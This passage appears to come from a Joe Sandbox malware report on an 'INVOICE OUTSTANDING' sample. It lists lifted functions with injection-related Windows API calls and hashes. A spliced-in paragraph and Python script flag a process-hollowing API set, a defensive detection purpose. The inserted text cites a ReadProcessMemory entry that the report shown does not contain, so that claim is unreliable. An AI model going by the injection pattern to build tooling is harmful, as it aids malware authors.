• Instruction ID: 13308ee9d6beb61e269c492b202e18ed85e9402ec444cce9b7b00c4116b277c6
• Opcode Fuzzy Hash: 5dd0854dd5374bf027aea9a47a66a138df773c16650d6738511c5d117bf7d350
• Instruction Fuzzy Hash: B421D3B5901259DFCB10DF9AD984BDEFBF8FB48314F10842AE918A3650D374A954CBA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 08321A4F
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: ContextThread
• String ID:
• API String ID: 1591575202-0
• Opcode ID: a2b74ba9ca7e92280612601077a0bba241a6eae89f6999011cf3f9193b1e43a8
• Instruction ID: 639f78e18f03f93164971229651c9a1809c6cf07bf97d2cd5c13a9083355098d
• Opcode Fuzzy Hash: a2b74ba9ca7e92280612601077a0bba241a6eae89f6999011cf3f9193b1e43a8
• Instruction Fuzzy Hash: 5E2106B1D106599FCB00CF9AC5857EEFBF4BB48624F14816AD418B3740D778A9448FA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 078BBF5B
Memory Dump Source
• Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: eb9f3219624edf9e5e0e69c522d3b1f3c4d46a215171e18bc6e38fc2e7b553b1
• Instruction ID: f40bffb6732a878ee2f48d2aaae3851e756362b583578b8516a3cb46e70f496a
• Opcode Fuzzy Hash: eb9f3219624edf9e5e0e69c522d3b1f3c4d46a215171e18bc6e38fc2e7b553b1
• Instruction Fuzzy Hash: 3B21E4B69006499FCB10DF9AC484BDEFBF4FB48324F108429E568A7750D778AA45CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014B9A49,00000800,00000000,00000000), ref: 014B9C5A
Memory Dump Source
• Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: 2e3b55618835b7b48335ff03880eb909d93780573fec0c957a47bb60ddd224cc
• Instruction ID: 62e44619271a554a1673583533a5035e6b086359cc41baa8c6ea35c8b2dcb49c
• Opcode Fuzzy Hash: 2e3b55618835b7b48335ff03880eb909d93780573fec0c957a47bb60ddd224cc
• Instruction Fuzzy Hash: 1D1100B69003099FDB10CF9AC484BDEFBF8AB49324F10842AE519A7710C778A945CFA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014B9A49,00000800,00000000,00000000), ref: 014B9C5A
Memory Dump Source
• Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: LibraryLoad
• String ID:
• API String ID: 1029625771-0
• Opcode ID: d83d3b7c57610f2627dfc2cf7fde0917e2c563035e14e80d09e1b30a5225f120
• Instruction ID: 1a0b055129e6fa13a661e51827c489b8f2ac3845ed2b8ce02e76a19e7e59f198
• Opcode Fuzzy Hash: d83d3b7c57610f2627dfc2cf7fde0917e2c563035e14e80d09e1b30a5225f120
• Instruction Fuzzy Hash: 031126B69003489FDB10CFAAD484BDEFBF4AB49324F14841EE519A7710C774A945CFA4
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08321BD3
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 96f79de1e776b922b155bdd180ccf46069f7ce76beab6a76be4149e873bcb1ac
• Instruction ID: 1d7d82b3cfa01bdc3abf06fc5caea90706ae3b2ee0ea3db23c8f12a6a2aec53f
• Opcode Fuzzy Hash: 96f79de1e776b922b155bdd180ccf46069f7ce76beab6a76be4149e873bcb1ac
• Instruction Fuzzy Hash: A01113B6800658DFCB10DF9AC985BDEBBF8FF49324F248419E528A7610D375A944CFA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08321BD3
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: e9d42ed7efe4f9926b094910b712d6f04a118d65adf7878ae3f5c87238430a71
• Instruction ID: 3f775705ac8e18d49d1ea0c0bb4125168a920ed7cee315e9ac2f0017d35e214a
• Opcode Fuzzy Hash: e9d42ed7efe4f9926b094910b712d6f04a118d65adf7878ae3f5c87238430a71
• Instruction Fuzzy Hash: DC1125B6800248DFCB10DF9AC884BDEBBF8FB48324F108419E528A7610C775A944CFA0
Uniqueness
Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 014B99CE
Memory Dump Source
• Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 26910114c91425eb5025a6dceb8a9dc1890e28a0eed4e04baaa0b0ddeef69ced
• Instruction ID: 46cdda141b51940cb1d612285116db1c3489be236c79c6e791080ad7734da8b8
• Opcode Fuzzy Hash: 26910114c91425eb5025a6dceb8a9dc1890e28a0eed4e04baaa0b0ddeef69ced
• Instruction Fuzzy Hash: 2C11DFB6C006498FDB10CF9AC484BDEFBF4AB89228F14851AD569A7710C778A545CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: 7a0d294c3ee19f41f1a185232ab95c755cccbaf6c7afbfc9c1dc0bcddae89c36
• Instruction ID: 0e1017b03c996ad776381b812890ed9a7d1d0c14f9a56f5e70f0a5eddd5a9fb5
• Opcode Fuzzy Hash: 7a0d294c3ee19f41f1a185232ab95c755cccbaf6c7afbfc9c1dc0bcddae89c36
• Instruction Fuzzy Hash: D91103B1800659CFCB10DF9AD984BDEFBF4EB48324F24845AD519A7640C775A944CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 0832271D
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: fba28bdb41cef716aa3dbd3cc29b6f511c4aacb7d408976d9582bc6c75742ef7
• Instruction ID: 56992e8744709a8293e73dfb7a2829c43287a7ec5a6e5f04484c0db28e86f932
• Opcode Fuzzy Hash: fba28bdb41cef716aa3dbd3cc29b6f511c4aacb7d408976d9582bc6c75742ef7
• Instruction Fuzzy Hash: 4611D0B6800359DFDB10DF9AD885BDEFBF8EB48724F20841AE559A7601C374A944CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: ResumeThread
• String ID:
• API String ID: 947044025-0
• Opcode ID: d5368e694a0fd0abac23f69acb4979b93bc422985f8afd350360d635941c341f
• Instruction ID: 3cff3972583750598391a85663ec1673613bff89b4e3feea2cbce0471a204357
• Opcode Fuzzy Hash: d5368e694a0fd0abac23f69acb4979b93bc422985f8afd350360d635941c341f
• Instruction Fuzzy Hash: CC1112B1800258CFCB10DF9AD984BDEFBF8EB48324F20841AD419A3700C774A944CFA1
Uniqueness
Uniqueness Score: -1.00%

APIs
• PostMessageW.USER32(?,?,?,?), ref: 0832271D
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: MessagePost
• String ID:
• API String ID: 410705778-0
• Opcode ID: ac248c263649129421b7513ca5d4239d9e94615fe14048b22c07067053f69246
• Instruction ID: 1afaea9bfb69395b16a8e3d4dd370e3661d499ed831ffc739033fae05919f6b7
• Opcode Fuzzy Hash: ac248c263649129421b7513ca5d4239d9e94615fe14048b22c07067053f69246
• Instruction Fuzzy Hash: C91100B6800358DFCB10DF99C985BDEFBF8EB48324F20841AD519A7601C374AA45CFA1
Uniqueness
Uniqueness Score: -1.00%
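Read together, the function entries above cluster by the memory region they were lifted from: the unbacked region at 08320000 holds functions referencing VirtualAllocEx, SetThreadContext, ResumeThread, PostMessageW and a function whose API ID resolves to ReadProcessMemory, which is the API set of a process-hollowing (RunPE) injector; the region at 014B0000 holds loader code (LoadLibraryExW, GetModuleHandleW) and 078B0000 a VirtualProtect caller. The script below is an added example, not Joe Sandbox code: it parses entries in the shape printed on this page, groups resolved API names per dump offset and flags a region when the core hollowing set appears together. It uses only the APIs visible in this section (no WriteProcessMemory or CreateProcess entry is listed here, so those are treated as optional supporting evidence). The way it maps the report's API ID field back to an API name (CamelCase words, sorted, ignoring Get/Set verbs and Ex/W/A suffixes) is a heuristic inferred from the entries on this page, not a documented format. The sample text is constructed from those entries with the Source File names shortened.

```python
"""Group this report's lifted functions by dump region and flag the
process-hollowing API set. Added example, not Joe Sandbox code; the
API-ID-to-name matching is a heuristic inferred from this page's entries."""
import re
from collections import defaultdict

# Constructed sample: call lines, offsets and API IDs copied from the entries
# in this report; Source File names shortened, other fields omitted.
SAMPLE_ENTRIES = """\
• Source File: (shortened), Offset: 08320000, based on PE: false
• API ID: MemoryProcessRead
• SetThreadContext.KERNELBASE(?,00000000), ref: 08321A4F
• Source File: (shortened), Offset: 08320000, based on PE: false
• API ID: ContextThread
• VirtualProtect.KERNELBASE(?,?,?,?), ref: 078BBF5B
• Source File: (shortened), Offset: 078B0000, based on PE: false
• API ID: ProtectVirtual
• LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,014B9A49,00000800,00000000,00000000), ref: 014B9C5A
• Source File: (shortened), Offset: 014B0000, based on PE: false
• API ID: LibraryLoad
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 08321BD3
• Source File: (shortened), Offset: 08320000, based on PE: false
• API ID: AllocVirtual
• GetModuleHandleW.KERNELBASE(00000000), ref: 014B99CE
• Source File: (shortened), Offset: 014B0000, based on PE: false
• API ID: HandleModule
• Source File: (shortened), Offset: 08320000, based on PE: false
• API ID: ResumeThread
• PostMessageW.USER32(?,?,?,?), ref: 0832271D
• Source File: (shortened), Offset: 08320000, based on PE: false
• API ID: MessagePost
"""

CALL_RE = re.compile(r"• (\w+)\.(\w+)\((.*)\), ref: ([0-9A-Fa-f]+)$")
OFFSET_RE = re.compile(r"Offset: ([0-9A-Fa-f]+)")
APIID_RE = re.compile(r"• API ID:\s*(.*)$")

# Assumption: tokens the API ID field drops (seen on this page: Get, Set, Ex, W).
NOISE_TOKENS = {"Get", "Set", "Ex", "W", "A"}


def api_key(name):
    """Order-insensitive key for an API name or API ID, minus noise tokens."""
    tokens = re.findall(r"[A-Z][a-z]*|[0-9]+", name)
    return tuple(sorted(t for t in tokens if t not in NOISE_TOKENS))


KNOWN_APIS = ["ReadProcessMemory", "WriteProcessMemory", "VirtualAllocEx",
              "VirtualProtect", "SetThreadContext", "ResumeThread",
              "LoadLibraryExW", "GetModuleHandleW", "PostMessageW",
              "CreateProcessW", "NtUnmapViewOfSection"]
API_BY_KEY = {api_key(n): n for n in KNOWN_APIS}


def parse_entries(text):
    """One entry per 'Source File ... Offset:' line; the API call lines the
    report prints before it belong to that entry."""
    entries, pending = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if m := CALL_RE.match(line):
            pending.append(m.group(1))            # API name, e.g. VirtualAllocEx
        elif m := OFFSET_RE.search(line):
            entries.append({"offset": m.group(1).upper(), "calls": pending, "api_ids": []})
            pending = []
        elif entries and (m := APIID_RE.match(line)):
            entries[-1]["api_ids"] = [p for p in m.group(1).split("$") if p]
    return entries


def resolve_apis(entry):
    """Explicit call names plus names recovered from the API ID field (the
    ReadProcessMemory and ResumeThread entries here carry no call line)."""
    names = set(entry["calls"])
    for api_id in entry["api_ids"]:
        names.add(API_BY_KEY.get(api_key(api_id), api_id))
    return names


HOLLOWING_CORE = {"VirtualAllocEx", "SetThreadContext", "ResumeThread"}
HOLLOWING_SUPPORT = {"ReadProcessMemory", "WriteProcessMemory",
                     "CreateProcessW", "NtUnmapViewOfSection"}


def apis_by_region(entries):
    regions = defaultdict(set)
    for e in entries:
        regions[e["offset"]] |= resolve_apis(e)
    return dict(regions)


def flag_hollowing(regions):
    """Regions whose functions together reference the whole core set."""
    return {off: sorted(apis & (HOLLOWING_CORE | HOLLOWING_SUPPORT))
            for off, apis in regions.items() if HOLLOWING_CORE <= apis}


if __name__ == "__main__":
    regions = apis_by_region(parse_entries(SAMPLE_ENTRIES))
    for off, apis in sorted(regions.items()):
        print(off, sorted(apis))
    for off, apis in flag_hollowing(regions).items():
        print(f"process-hollowing API set in region {off}: {', '.join(apis)}")
```

Run against the full report text, the same parser also picks up regions that carry only loader or unpacking APIs (the 014B0000 and 078B0000 clusters here) without flagging them, which is the point of keying on the region rather than on any single call.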

Memory Dump Source
• Source File: 00000000.00000002.324453857.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_13fd000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 9b867c50b578a18f6528894388d0b07de2e8476eeb17fe1a7d59032ce6d7f6a3
• Instruction ID: 753cd9097d5d0cbb5a412e4e9286cbb68efba1973bfe1487e094a91b01f9921d
• Opcode Fuzzy Hash: 9b867c50b578a18f6528894388d0b07de2e8476eeb17fe1a7d59032ce6d7f6a3
• Instruction Fuzzy Hash: F72125B2504244DFDB01DF94D8C8B66BF65FB8832CF24856DEA090B647C336D849CBA2
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324618530.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_140d000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 57e52fa93c045db40e8851675bc8bfb0374b4cdcab1ad929d83808406fb46443
                                                                                                                          • Instruction ID: c7537ed41b7e7329e869b436af715238cc06809565bb6daf047723b44c5ecb1e
                                                                                                                          • Opcode Fuzzy Hash: 57e52fa93c045db40e8851675bc8bfb0374b4cdcab1ad929d83808406fb46443
                                                                                                                          • Instruction Fuzzy Hash: 0D21D771904240EFDB06DFD5D9C0B26BB65FB84324F24C57EE8094B796C736D84ACA61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324618530.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_140d000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b4926f31e1648b5d0a7ee918182c4bc18d8b2f174193876dd20497c0dd4bfb11
                                                                                                                          • Instruction ID: 639d8b86aa9f5e22680a1eb9d21f6a29438f172efe8cb85288296125dc6dc18d
                                                                                                                          • Opcode Fuzzy Hash: b4926f31e1648b5d0a7ee918182c4bc18d8b2f174193876dd20497c0dd4bfb11
                                                                                                                          • Instruction Fuzzy Hash: 7321D3B1904240DFDB16DF95D8C0B16BB65EB84358F24C57AD80E4B796C336D84BCA61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324618530.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_140d000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1de071dd1900fd0cfacc045cae2ebbaf8f520038ae34801b800e5b1073e4caa9
                                                                                                                          • Instruction ID: 201d582ae1391b7384f8944a92e26287d6c13afcb63231f6838963adf9e3c3a7
                                                                                                                          • Opcode Fuzzy Hash: 1de071dd1900fd0cfacc045cae2ebbaf8f520038ae34801b800e5b1073e4caa9
                                                                                                                          • Instruction Fuzzy Hash: 592192755093808FDB03CF64D990716BF71EB46214F28C5EBD8498B6A7C33AD84ACB62
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324453857.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_13fd000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
                                                                                                                          • Instruction ID: b5230be661e85dda9289fb82da7c0e8ac3c149a25394043f253aca32fc15f0a8
                                                                                                                          • Opcode Fuzzy Hash: 237ac01297be104bb1ca90ead38bbc6519d1d4d0714ef7f30f6c65ef6beda5fc
                                                                                                                          • Instruction Fuzzy Hash: 7511B176804280DFDB12CF54D9C8B16BF71FB84328F2486ADD9090B657C33AD456CBA2
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324618530.000000000140D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0140D000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_140d000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 35e90ea1cb6544ca5223f67d86710fd0bcf6f02b7d75b7b0b038a5b7a74a747e
                                                                                                                          • Instruction ID: 8ca80c5e364abb887b2715880decc727a27a169058f7eb51cca258be1ee2247e
                                                                                                                          • Opcode Fuzzy Hash: 35e90ea1cb6544ca5223f67d86710fd0bcf6f02b7d75b7b0b038a5b7a74a747e
                                                                                                                          • Instruction Fuzzy Hash: 9A118E75904280DFDB12CF94D5C4B16BB71FB84224F24C6AED8494B7A6C33AD85ACB51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324453857.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_13fd000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 68e626977351561a7023bc975d98067800f8db0d7f1bc105d08ba63e35cbebd6
                                                                                                                          • Instruction ID: af5b55f5d301c6870dfd75b91a9ab02108679209b2204edeef8967c131d0a6d2
                                                                                                                          • Opcode Fuzzy Hash: 68e626977351561a7023bc975d98067800f8db0d7f1bc105d08ba63e35cbebd6
                                                                                                                          • Instruction Fuzzy Hash: 5501F7710043C49AE7119E56CD88B66BBACDF4122CF18C55EEB051FA87C3799848CAB1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.324453857.00000000013FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 013FD000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_13fd000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 81fe93f2b25d0d95584e059179e7a8b5b297123e3bef6e151406b8c9b24ed16b
                                                                                                                          • Instruction ID: 1225e649a474334703c5b73f823ef001c34f068e33cdcecdf949324cf3402a2c
                                                                                                                          • Opcode Fuzzy Hash: 81fe93f2b25d0d95584e059179e7a8b5b297123e3bef6e151406b8c9b24ed16b
                                                                                                                          • Instruction Fuzzy Hash: 3CF068714042849AE7119E15DCC8B62FFACDB41638F18C45AEE085F687C3799844CAB1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: "]X`$"]X`
                                                                                                                          • API String ID: 0-4180481408
                                                                                                                          • Opcode ID: 81ca2d2b06b3766b86e0dca7542ecf3dd8472e99bd958db74c7356e4f5b83e59
                                                                                                                          • Instruction ID: 5d083a4adf8ca517396d4a0ba691e332ae13cafbfd9f5678c68511ab52640116
                                                                                                                          • Opcode Fuzzy Hash: 81ca2d2b06b3766b86e0dca7542ecf3dd8472e99bd958db74c7356e4f5b83e59
                                                                                                                          • Instruction Fuzzy Hash: 0D7112B4E15219CFCB18CFA9C5805DEFBF6FB99214F24942AD415F7324D3349A428BA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: ^.}$^.}
                                                                                                                          • API String ID: 0-114468162
                                                                                                                          • Opcode ID: ef72bef9a4b8193c2bc2ab7bde92183f52c68a764d35c6d4ba2d57af246f67aa
                                                                                                                          • Instruction ID: 22e43552f74c6c323fa15b41be12f5a05191fd484b1af29b025afd450a207e05
                                                                                                                          • Opcode Fuzzy Hash: ef72bef9a4b8193c2bc2ab7bde92183f52c68a764d35c6d4ba2d57af246f67aa
                                                                                                                          • Instruction Fuzzy Hash: 7C4137B0E15219DFDB28CFAAD880BDEFBB2BB89204F14C1AAD508A7354DB3059458F54
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: D0k
                                                                                                                          • API String ID: 0-1329582393
                                                                                                                          • Opcode ID: 52c3a30d56ce010d45b8385838c6690e6303878c44cb1f1ed56a6421be4dcf95
                                                                                                                          • Instruction ID: 32e86279153c4d5643f1faf0bffed35252216ee4011eac4ffecc3ef28a7ee951
                                                                                                                          • Opcode Fuzzy Hash: 52c3a30d56ce010d45b8385838c6690e6303878c44cb1f1ed56a6421be4dcf95
                                                                                                                          • Instruction Fuzzy Hash: 43C1C2B1F0021AAFCF18DFB9C4516EEBBF2AF99318F149469D405E7354EB3499018BA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: "]X`
                                                                                                                          • API String ID: 0-1892397902
                                                                                                                          • Opcode ID: 3ee85d4d41d77432ebbb27fec4ede631c072609d83a255ad3eff935d731cb07a
                                                                                                                          • Instruction ID: 241c5006c4148faa9127dd0cb3eff7a4458cbb11969275f1551c13d90393dd00
                                                                                                                          • Opcode Fuzzy Hash: 3ee85d4d41d77432ebbb27fec4ede631c072609d83a255ad3eff935d731cb07a
                                                                                                                          • Instruction Fuzzy Hash: 1F6102B4E15209CFCB18CFA9C5805DEFBF6FB99214F24942AD415F7324D334AA418BA8
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d!}
                                                                                                                          • API String ID: 0-3787972460
                                                                                                                          • Opcode ID: a49313e08ba30a162c97d654dddd60b924fdeb00ad8f8714c915525798d4fda3
                                                                                                                          • Instruction ID: 447ef8a2a6364f5a77b6a586daddfd6f6da39ad80d0da611b75b976cda5b20a9
                                                                                                                          • Opcode Fuzzy Hash: a49313e08ba30a162c97d654dddd60b924fdeb00ad8f8714c915525798d4fda3
                                                                                                                          • Instruction Fuzzy Hash: D64104B0E1521A8FCB58CFAAC4805EEFBF6AF99304F24C46AC515E7314E7349A418F94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d!}
                                                                                                                          • API String ID: 0-3787972460
                                                                                                                          • Opcode ID: ea8ac4d7f816c1da5122f9a783177aa89a61e9e720b25f5e3b22dc864ed5db95
                                                                                                                          • Instruction ID: 67d1e2810a00e12512137fae0bcb844a232626224dc73128a33466c8322db4e0
                                                                                                                          • Opcode Fuzzy Hash: ea8ac4d7f816c1da5122f9a783177aa89a61e9e720b25f5e3b22dc864ed5db95
                                                                                                                          • Instruction Fuzzy Hash: A241E1B0E1421A8FCB58CFAAC8815EEFBB6AB99304F24D46AC515F7314D7349A418F94
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
